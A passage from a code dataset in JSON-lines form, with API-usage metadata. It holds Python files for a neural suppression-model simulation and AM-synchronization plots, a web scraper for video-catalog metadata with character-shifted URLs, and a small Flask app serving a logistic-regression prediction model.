"line_number": 7, "usage_type": "attribute"}, {"api_name": "plotly.express", "line_number": 7, "usage_type": "name"}, {"api_name": "plotly.express.parallel_coordinates", "line_number": 8, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 8, "usage_type": "name"}, {"api_name": "plotly.express.colors", "line_number": 11, "usage_type": "attribute"}, {"api_name": "plotly.express", "line_number": 11, "usage_type": "name"}, {"api_name": "time.time", "line_number": 16, "usage_type": "call"}]}
+{"seq_id": "38273194895", "text": "\"\"\"\nSimulate model with many parameters.\n\"\"\"\n\nimport os\nimport numpy as np\nfrom jaratoolbox import settings\nimport studyparams\nimport figparams\nimport model_suppression as suppmodel\nreload(suppmodel)\n\nfigName = 'figure_model'\ndataDir = os.path.join(settings.FIGURES_DATA_PATH, figparams.STUDY_NAME, figName)\n\n# -- Simulate model --\nnCells = 101\n\nRANDOMIZED = 1\nnp.random.seed(1)\n\ndef random_in_range(low,high,shape):\n \"\"\"Return equally distributed random numbers in specified range\"\"\"\n width = high-low\n randVec = width*np.random.rand(shape) + low\n return randVec\n\nif RANDOMIZED:\n nSamples = 200\n #rfWidths = {'PV':5, 'SOM':5, 'Thal':5}\n rfWidths = None\n# ampPVvec = random_in_range(-1, -30, nSamples)\n# ampSOMvec = random_in_range(-1, -30, nSamples)\n# stdThalvec = random_in_range(2, 5, nSamples)\n suppIndexVec = np.empty((3,nSamples)) # 3:Control, PV, SOM\n changeAtPeakVec = np.empty((2,nSamples)) # 2:PV-Control, SOM-Control\n changeAtWNVec = np.empty((2,nSamples)) # 2:PV-Control, SOM-Control\n \n oct_range = 6\n\n stdPVoct = 0.8 * (nCells-1)/oct_range\n ampPVvec = random_in_range(-1, -30, nSamples) \n ampSOMvec = random_in_range(-1, -30, nSamples) \n stdSOMvec = random_in_range(1, 2, nSamples)\n stdThalvec = random_in_range(.2, 1, nSamples)\n\n\n for inds in range(nSamples):\n wParams = {'ampPV':ampPVvec[inds], 'stdPV':stdPVoct, #'stdPV':10,\n 'ampSOM':ampSOMvec[inds], 'stdSOM':stdSOMvec[inds] * stdPVoct, #'stdSOM':20, \n 'ampThal':100, 'stdThal':stdThalvec[inds] * stdPVoct} #stdThalvec[inds] \n net = suppmodel.Network(nCells, wParams, rfWidths)\n centerCellOutput, bandwidths, condLabels = net.simulate_inactivation()\n suppIndex = suppmodel.suppression_index(centerCellOutput)\n changeAtPeak, changeAtWN = suppmodel.change_in_response(centerCellOutput)\n suppIndexVec[:,inds] = suppIndex\n changeAtPeakVec[:,inds] = changeAtPeak\n changeAtWNVec[:,inds] = changeAtWN\nelse:\n ampPVvec = np.arange(-2,-44, -4) # -20\n ampSOMvec = np.arange(-2,-44, -4) # -20\n stdThalvec = [5,7,9]#np.arange(3, 15, 2) # 6\n\n suppIndexAll = np.empty((3,len(ampPVvec),len(ampSOMvec),len(stdThalvec))) # 3:Control, PV, SOM\n changeAtPeakAll = np.empty((2,len(ampPVvec),len(ampSOMvec),len(stdThalvec))) # 2:PV-Control, SOM-Control\n changeAtWNAll = np.empty((2,len(ampPVvec),len(ampSOMvec),len(stdThalvec))) # 2:PV-Control, SOM-Control\n\n for indPV,ampPV in enumerate(ampPVvec):\n for indSOM,ampSOM in enumerate(ampSOMvec):\n for indThal,stdThal in enumerate(stdThalvec):\n wParams = {'ampPV':ampPV, 'stdPV':10,\n 'ampSOM':ampSOM, 'stdSOM':30,\n 'ampThal':100, 'stdThal':stdThal}\n net = suppmodel.Network(nCells, wParams)\n centerCellOutput, bandwidths, condLabels = net.simulate_inactivation()\n suppIndex = suppmodel.suppression_index(centerCellOutput)\n changeAtPeak, changeAtWN = suppmodel.change_in_response(centerCellOutput)\n suppIndexAll[:,indPV,indSOM,indThal] = suppIndex\n changeAtPeakAll[:,indPV,indSOM,indThal] = changeAtPeak\n changeAtWNAll[:,indPV,indSOM,indThal] = changeAtWN\n nConds = len(ampPVvec)*len(ampSOMvec)*len(stdThalvec) \n suppIndexVec = suppIndexAll.reshape([3,nConds])\n changeAtPeakVec = changeAtPeakAll.reshape([2,nConds])\n changeAtWNVec = changeAtWNAll.reshape([2,nConds])\n\n \nimport matplotlib.pyplot as plt\n\nplt.clf()\n\nmarkerSize = 3\n\n# -- Plot supp index --\nplt.subplot(2,2,1)\nplt.plot(suppIndexVec[0],suppIndexVec[1],'sb', mfc='none', ms=markerSize)\nplt.plot(suppIndexVec[0],suppIndexVec[2],'or', mfc='none', ms=markerSize)\nxLims = [-0.1,1.1]\nplt.xlim(xLims)\nplt.ylim(xLims)\nplt.plot(xLims,xLims,'--',color='0.5')\nplt.xlabel('Suppression Index (control)')\nplt.ylabel('Suppression Index (inactivation)')\n#plt.axis('square')\n\nplt.subplot(2,2,2)\navgSIchangePV = np.median(suppIndexVec[1]-suppIndexVec[0])\navgSIchangeSOM = np.median(suppIndexVec[2]-suppIndexVec[0])\nplt.bar(1,avgSIchangePV, fc='w', ec='b', lw=2)\nplt.bar(2,avgSIchangeSOM, fc='w', ec='r', lw=2)\n\n\n# -- Plot change in response --\nplt.subplot(2,2,3)\nplt.plot(changeAtPeakVec[0,:],changeAtWNVec[0,:],'sb', mfc='none', ms=markerSize)\nplt.plot(changeAtPeakVec[1,:],changeAtWNVec[1,:],'or', mfc='none', ms=markerSize)\nxLims = [-50,1500]\nplt.xlim(xLims)\nplt.ylim(xLims)\nplt.plot(xLims,xLims,'--',color='0.5')\nplt.xlabel('Change in response to preferred bandwidth')\nplt.ylabel('Change in response to WN')\n#plt.axis('square')\n\nplt.subplot(2,2,2)\n\n\n# -- Save data --\noutputFile = 'response_change_summary.npz'\noutputFullPath = os.path.join(dataDir,outputFile)\n\nnp.savez(outputFullPath, suppIndexVec=suppIndexVec,\n changeAtPeakVec=changeAtPeakVec, changeAtWNVec=changeAtWNVec,\n condLabels=condLabels)\nprint(\"Saved {}\".format(outputFullPath))\n", "repo_name": "sjara/jaratest", "sub_path": "common/2018acsup/generate_model.py", "file_name": "generate_model.py", "file_ext": "py", "file_size_in_byte": 5103, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "jaratoolbox.settings.FIGURES_DATA_PATH", "line_number": 14, "usage_type": "attribute"}, {"api_name": "jaratoolbox.settings", "line_number": 14, "usage_type": "name"}, {"api_name": "figparams.STUDY_NAME", "line_number": 14, "usage_type": "attribute"}, {"api_name": "numpy.random.seed", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 20, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 25, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 37, "usage_type": "call"}, {"api_name": "model_suppression.Network", "line_number": 52, "usage_type": "call"}, {"api_name": "model_suppression.suppression_index", "line_number": 54, "usage_type": "call"}, {"api_name": "model_suppression.change_in_response", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 66, "usage_type": "call"}, {"api_name": "model_suppression.Network", "line_number": 74, "usage_type": "call"}, {"api_name": "model_suppression.suppression_index", "line_number": 76, "usage_type": "call"}, {"api_name": "model_suppression.change_in_response", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 94, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 95, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 96, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 101, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 102, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "numpy.median", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 124, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path", "line_number": 129, "usage_type": "attribute"}, {"api_name": "numpy.savez", "line_number": 131, "usage_type": "call"}]}
+{"seq_id": "3425393519", "text": "import requests\nimport bs4\n\n\ndef encode(url):\n return \"\".join([chr((ord(rune) + 1) % 128) for rune in url])\n\n\nclass Bus:\n ''' Data source -- BUS\n '''\n base_url = encode(\"gssor9..vvv-i`uatr-bnl.\")\n search_prefix = encode(\"rd`qbg.\")\n http_proxy = \"\"\n\n def __init__(self, http_proxy=\"\"):\n self.http_proxy = http_proxy\n\n def Get(self, designatio):\n result = {}\n\n # URL for searching designatio\n URL = self.base_url + self.search_prefix + designatio\n\n # Using requests\n headers = {\n 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n 'accept-encoding': 'gzip, deflate, br',\n 'accept-language': 'zh-CN,zh;q=0.9,en;q=0.8',\n 'cache-control': 'max-age=0',\n 'cookie': 'existmag=all',\n 'referer': 'https://www.javbus.com',\n 'sec-ch-ua': '\"Not_A Brand\";v=\"99\", \"Google Chrome\";v=\"109\", \"Chromium\";v=\"109\"',\n 'sec-ch-ua-mobile': '?0',\n 'sec-ch-ua-platform': '\"macOS\"',\n 'sec-fetch-dest': 'document',\n 'sec-fetch-mode': 'navigate',\n 'sec-fetch-site': 'same-origin',\n 'sec-fetch-user': '?1',\n 'upgrade-insecure-requests': '1',\n 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36',\n }\n response = requests.get(\n URL, proxies={\"http\": self.http_proxy}, headers=headers)\n\n # parse html\n soup = bs4.BeautifulSoup(response.content, features=\"html.parser\")\n\n search_result = soup.select(\".item\")\n if search_result is None or len(search_result) == 0:\n # No result\n raise Exception(\"Not recruited\")\n\n # multiple result - choose the correct one\n matched = []\n for r in search_result:\n id = r.find(\"date\").string\n if id == designatio:\n title = r.find(\"img\").attrs[\"title\"]\n matched.append((id + \" \" + title, r.find(\"a\").attrs[\"href\"]))\n\n idx = 0\n if len(matched) > 1:\n print(\"Multiple Choice:\")\n for i in range(0, len(matched)):\n print(\" [%d] %s\" % (i, matched[i][0]))\n idx = int(input(\"\\nSelect > \"))\n URL = matched[idx][1]\n\n # get info\n response = requests.get(\n URL, proxies={\"http\": self.http_proxy}, headers=headers)\n soup = bs4.BeautifulSoup(response.content, features=\"html.parser\")\n\n # search title\n result[\"title\"] = soup.select_one(\"body > .container > h3\").string\n\n # cover image\n cover_url = soup.select_one(\".bigImage\")[\"href\"]\n if cover_url.startswith('/'):\n cover_url = self.base_url + cover_url\n result[\"cover_url\"] = cover_url\n\n # outline \n try:\n airav_URL = encode(\"gssor9..vvv-`hq`u-vhjh.uhcdn.\") + designatio\n outline_rep = requests.get(\n airav_URL, proxies={\"http\": self.http_proxy}, headers=headers)\n airav_soup = bs4.BeautifulSoup(\n outline_rep.content, features=\"html.parser\")\n result[\"outline\"] = airav_soup.select_one(\".synopsis > p\").string\n except:\n pass\n\n # infomation\n attributes = [e.string for e in soup.select(\".header\")]\n include = {\n \"designatio\": '識別碼:' in attributes,\n \"date\": '發行日期:' in attributes,\n \"length\": '長度:' in attributes,\n \"director\": '導演:' in attributes,\n \"maker\": '製作商:' in attributes,\n \"label\": '發行商:' in attributes,\n \"series\": '系列:' in attributes,\n \"genres\": '類別:' in attributes,\n \"cast\": '演員' in attributes,\n }\n\n # Attributes Extract lambda function\n extract = {\n \"designatio\": lambda soup, i: i.select(\"span\")[1].string,\n \"date\": lambda soup, i: str(i).split(\" \")[1].rstrip(\"
\"),\n \"length\": lambda soup, i: str(i).split(\" \")[1].rstrip(\"\").strip().rstrip(\"分鐘\"),\n \"director\": lambda soup, i: i.a.string,\n \"maker\": lambda soup, i: i.a.string,\n \"label\": lambda soup, i: i.a.string,\n \"series\": lambda soup, i: i.a.string,\n \"genres\": lambda soup, i: [genre.string for genre in soup.select('a[href^=\"https://www.javbus.com/genre/\"]')][2:],\n \"cast\": lambda soup, i: [actor.a.string for actor in soup.select('span[onmouseout^=\"hoverdiv\"]')],\n }\n\n info = soup.select(\".info > p\")\n idx = 0\n\n for attr in [\"designatio\", \"date\", \"length\", \"director\", \"maker\", \"label\", \"series\", \"genres\", \"cast\"]:\n if include[attr]:\n result[attr] = extract[attr](soup, info[idx])\n idx += 1\n return result\n", "repo_name": "Lqlsoftware/avutil", "sub_path": "avutil/source/bus.py", "file_name": "bus.py", "file_ext": "py", "file_size_in_byte": 5073, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 24, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 43, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 47, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 71, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 73, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 87, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 89, "usage_type": "call"}]}
+{"seq_id": "8506577518", "text": "from wsgiref import simple_server\r\nfrom flask import Flask, request, app,render_template\r\nfrom flask import Response\r\nfrom flask_cors import CORS\r\nfrom logistic_deploy import predObj\r\n\r\napp = Flask(__name__)\r\nCORS(app)\r\napp.config['DEBUG'] = True\r\n\r\n\r\nclass ClientApi:\r\n\r\n def __init__(self):\r\n self.predObj = predObj()\r\n\r\n\r\n\r\n@app.route('/')\r\ndef home():\r\n return render_template('index.html')\r\n\r\n@app.route(\"/predict\", methods=['POST'])\r\ndef predictRoute():\r\n try:\r\n rateMarriage=int(request.form['rateMarriage'])\r\n age = int(request.form['age'])\r\n yearsMarried = int(request.form['yearsMarried'])\r\n children = int(request.form['children'])\r\n education = int(request.form['education'])\r\n occupation = int(request.form['occupation'])\r\n husbandOccupation = int(request.form['husbandOccupation'])\r\n religious = int(request.form['religious'])\r\n occ_2 = 0\r\n occ_3=0\r\n occ_4=0\r\n occ_5=0\r\n occ_6=0\r\n occ_husb_2=0\r\n occ_husb_3=0\r\n occ_husb_4=0\r\n occ_husb_5=0\r\n occ_husb_6=0\r\n if occupation == 2:\r\n occ_2 = 1\r\n elif occupation == 3:\r\n occ_3 = 1\r\n elif occupation == 4:\r\n occ_4 = 1\r\n elif occupation == 5:\r\n occ_5 = 1\r\n elif occ_6 == 6:\r\n occ_6 = 1\r\n else:\r\n print(occupation)\r\n \r\n if husbandOccupation == 2:\r\n occ_husb_2 = 1\r\n elif husbandOccupation == 3:\r\n occ_husb_3 = 1\r\n elif husbandOccupation == 4:\r\n occ_husb_4 = 1\r\n elif husbandOccupation == 5:\r\n occ_husb_5 = 1\r\n elif husbandOccupation == 6:\r\n occ_husb_6 = 1\r\n else:\r\n print(husbandOccupation)\r\n data = [[1,occ_2,occ_3,occ_4,occ_5,occ_6,occ_husb_2,occ_husb_3,occ_husb_4,occ_husb_5,occ_husb_6,rateMarriage,age,yearsMarried,children,religious,education]]\r\n print('data is: ', data)\r\n pred=predObj()\r\n res = pred.predict_log(data)\r\n\r\n print('result is ',res)\r\n return render_template('result.html', prediction_text='{}'.format(res))\r\n except ValueError:\r\n return Response(\"Value not found\")\r\n except Exception as e:\r\n print('exception is ',e)\r\n return Response(e)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n clntApp = ClientApi()\r\n #host = '0.0.0.0'\r\n #port = 5000\r\n app.run(debug=True)", "repo_name": "tejasjbansal/Woman-Affair-Prediction", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 2484, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.app", "line_number": 7, "usage_type": "name"}, {"api_name": "flask.Flask", "line_number": 7, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 8, "usage_type": "call"}, {"api_name": "flask.app", "line_number": 8, "usage_type": "argument"}, {"api_name": "flask.app.config", "line_number": 9, "usage_type": "attribute"}, {"api_name": "flask.app", "line_number": 9, "usage_type": "name"}, {"api_name": "logistic_deploy.predObj", "line_number": 15, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 21, "usage_type": "call"}, {"api_name": "flask.app.route", "line_number": 19, "usage_type": "call"}, {"api_name": "flask.app", "line_number": 19, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 26, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 26, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 27, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 27, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 28, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 28, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 29, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 29, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 30, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 30, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 31, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 31, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 32, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 32, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 33, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 33, "usage_type": "name"}, {"api_name": "logistic_deploy.predObj", "line_number": 71, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 75, "usage_type": "call"}, {"api_name": "flask.Response", "line_number": 77, "usage_type": "call"}, {"api_name": "flask.Response", "line_number": 80, "usage_type": "call"}, {"api_name": "flask.app.route", "line_number": 23, "usage_type": "call"}, {"api_name": "flask.app", "line_number": 23, "usage_type": "name"}, {"api_name": "flask.app.run", "line_number": 87, "usage_type": "call"}, {"api_name": "flask.app", "line_number": 87, "usage_type": "name"}]}
+{"seq_id": "38276237285", "text": "from matplotlib import pyplot as plt\nfrom collections import Counter\nfrom jaratest.nick.stats import am_funcs\nreload(am_funcs)\nimport pandas\nimport numpy as np\nfrom jaratoolbox import colorpalette\nfrom jaratoolbox import extraplots\nimport matplotlib\nmatplotlib.rcParams['svg.fonttype'] = 'none'\nimport matplotlib.pyplot as plt\n# import seaborn\n\n\nthaldbfn = '/home/nick/src/jaratest/nick/analysis/poster_ephys/thalamusdb_q10.pickle'\ncortdbfn = '/home/nick/src/jaratest/nick/analysis/poster_ephys/cortexdb_q10.pickle'\nthaldb = pandas.read_pickle(thaldbfn)\ncortdb = pandas.read_pickle(cortdbfn)\n\nlaserTrainThresh = 1.5\nnoiseBurstThresh = 2\nisiThresh = 4\n\nthalNonID = thaldb[(thaldb['isiViolations']noiseBurstThresh) & (thaldb['lasertrainZ']noiseBurstThresh) & (cortdb['lasertrainZ']noiseBurstThresh) & (thaldb['lasertrainZ']>laserTrainThresh)]\ncortID = cortdb[(cortdb['isiViolations']noiseBurstThresh) & (cortdb['lasertrainZ']>laserTrainThresh)]\n\nthalamHSNonID = thalNonID['highestSync']\ncortamHSNonID = cortNonID['highestSync']\n\nthalamHSID = thalID['highestSync']\ncortamHSID = cortID['highestSync']\n\n\n\n# Percentage of neurons that sync to the freqs we tested\nlowFreq = 4\nhighFreq = 128\nnFreqs = 11\nfreqs = np.logspace(np.log10(lowFreq),np.log10(highFreq),nFreqs)\nfreqs = np.round(freqs, decimals=1)\nfreqs = np.r_[0, freqs]\n\nthalHighestNonID = np.round(thalamHSNonID.dropna(), decimals=1)\nthalHighestID = np.round(thalamHSID.dropna(), decimals=1)\nnThal = len(thalHighestNonID) + len(thalHighestID)\n\ncortHighestNonID = np.round(cortamHSNonID.dropna(), decimals=1)\ncortHighestID = np.round(cortamHSID.dropna(), decimals=1)\nnCort = len(cortHighestNonID) + len(cortHighestID)\n\nthalCounterNonID = Counter(thalHighestNonID)\nthalCounterID = Counter(thalHighestID)\n\ncortCounterNonID = Counter(cortHighestNonID)\ncortCounterID = Counter(cortHighestID)\n\nthalcountsNonID = [100*thalCounterNonID[freq]/np.double(nThal) for freq in freqs]\nthalcountsID = [100*thalCounterID[freq]/np.double(nThal) for freq in freqs]\n\ncortcountsNonID = [100*cortCounterNonID[freq]/np.double(nCort) for freq in freqs]\ncortcountsID = [100*cortCounterID[freq]/np.double(nCort) for freq in freqs]\n\nindex = np.arange(len(freqs))\nbar_width=0.35\nplt.clf()\nfig = plt.gcf()\nfig.set_size_inches(10.5, 3.7)\nlinewidth=2\nfontsize=20\n\nrects11 = plt.bar(index,\n thalcountsID,\n bar_width,\n label='Tagged thalamo-striatal',\n facecolor=colorpalette.TangoPalette['Orange2'],\n edgecolor=colorpalette.TangoPalette['Orange2'],\n linewidth = linewidth)\n\nrects12 = plt.bar(index,\n thalcountsNonID,\n bar_width,\n label='Thalamus, non-tagged',\n facecolor='w',\n edgecolor=colorpalette.TangoPalette['Orange2'],\n bottom=thalcountsID,\n linewidth=linewidth)\n\nrects21 = plt.bar(index+bar_width+0.04,\n cortcountsID,\n bar_width,\n label='Tagged cortico-striatal',\n facecolor=colorpalette.TangoPalette['Plum2'],\n edgecolor=colorpalette.TangoPalette['Plum2'],\n linewidth=linewidth)\n\nrects22 = plt.bar(index+bar_width+0.04,\n cortcountsNonID,\n bar_width,\n label='Cortex, non-tagged',\n facecolor='w',\n edgecolor=colorpalette.TangoPalette['Plum2'],\n bottom=cortcountsID,\n linewidth=linewidth)\n\nplt.xlabel('Maximum AM rate to which responses\\nwere synchronized (Hz)', fontsize=fontsize)\nplt.ylabel('% Neurons', fontsize=fontsize)\n# plt.title('Scores by group and gender')\nplt.xticks(index + bar_width, freqs)\nplt.legend(loc='upper left', prop={'size':15})\nplt.tight_layout()\nax = plt.gca()\nax.set_yticks(np.linspace(0, 40, 5))\nextraplots.set_ticks_fontsize(ax, fontsize)\nextraplots.boxoff(ax)\n\nplt.show()\n\n# Dependence of mean FR on AM rate\n# thalamR = thalCells['amRval']\n# cortamR = cortCells['amRval']\n# plt.clf()\n# plt.plot(np.random.normal(1, 0.05, len(thalamR.dropna())), thalamR.dropna(), '.', ms=10)\n# plt.hold(True)\n# plt.plot(np.random.normal(3, 0.05, len(cortamR.dropna())), cortamR.dropna(), '.', ms=10)\n# plt.xlim([0.5, 3.5])\n# ax = plt.gca()\n# ax.set_xticks([1, 3])\n# ax.set_xticklabels(['Thalamus', 'Cortex'])\n# plt.ylabel('Correlation coefficient between\\nfiring rate and AM rate')\n# plt.show()\n\n### EXAMPLE NEURON HUNT\n# corrCells = thalCells[np.abs(thalCells['amRval'])>0.5]\n# corrCells = cortCells[np.abs(cortCells['amRval'])>0.5]\n\n# for indCell, cell in corrCells.iterrows():\n# plt.clf()\n# try:\n# sessiontypeIndex = cell['sessiontype'].index('AM')\n# except ValueError: #The cell does not have this session type\n# continue\n# print indCell\n# # r_val, frArray = am_funcs.am_dependence(cell, frArray=True)\n# # plt.plot(frArray)\n# # plt.waitforbuttonpress()\n# plt.subplot(3, 1, 1)\n# am_funcs.plot_am_raster(cell)\n# plt.subplot(3, 1, 2)\n# am_funcs.plot_am_psth(cell)\n# plt.subplot(3, 1, 3)\n# r_val, frArray, possibleFreq = am_funcs.am_dependence(cell, frArray=True)\n# plt.plot(frArray)\n# ax = plt.gca()\n# ax.set_xticks(np.arange(len(possibleFreq)))\n# ax.set_xticklabels(np.round(possibleFreq, decimals=1))\n# plt.xlabel(r_val)\n# plt.waitforbuttonpress()\n", "repo_name": "sjara/jaratest", "sub_path": "nick/analysis/poster_ephys/am_stats_plot.py", "file_name": "am_stats_plot.py", "file_ext": "py", "file_size_in_byte": 5693, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "jaratest.nick.stats.am_funcs", "line_number": 4, "usage_type": "argument"}, {"api_name": "matplotlib.rcParams", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pandas.read_pickle", "line_number": 17, "usage_type": "call"}, {"api_name": "pandas.read_pickle", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.logspace", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.log10", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.r_", "line_number": 44, "usage_type": "attribute"}, {"api_name": "numpy.round", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 51, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 54, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 55, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 57, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.double", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.double", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.double", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.double", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "jaratoolbox.colorpalette.TangoPalette", "line_number": 78, "usage_type": "attribute"}, {"api_name": "jaratoolbox.colorpalette", "line_number": 78, "usage_type": "name"}, {"api_name": "jaratoolbox.colorpalette.TangoPalette", "line_number": 79, "usage_type": "attribute"}, {"api_name": "jaratoolbox.colorpalette", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "jaratoolbox.colorpalette.TangoPalette", "line_number": 87, "usage_type": "attribute"}, {"api_name": "jaratoolbox.colorpalette", "line_number": 87, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 91, "usage_type": "name"}, {"api_name": 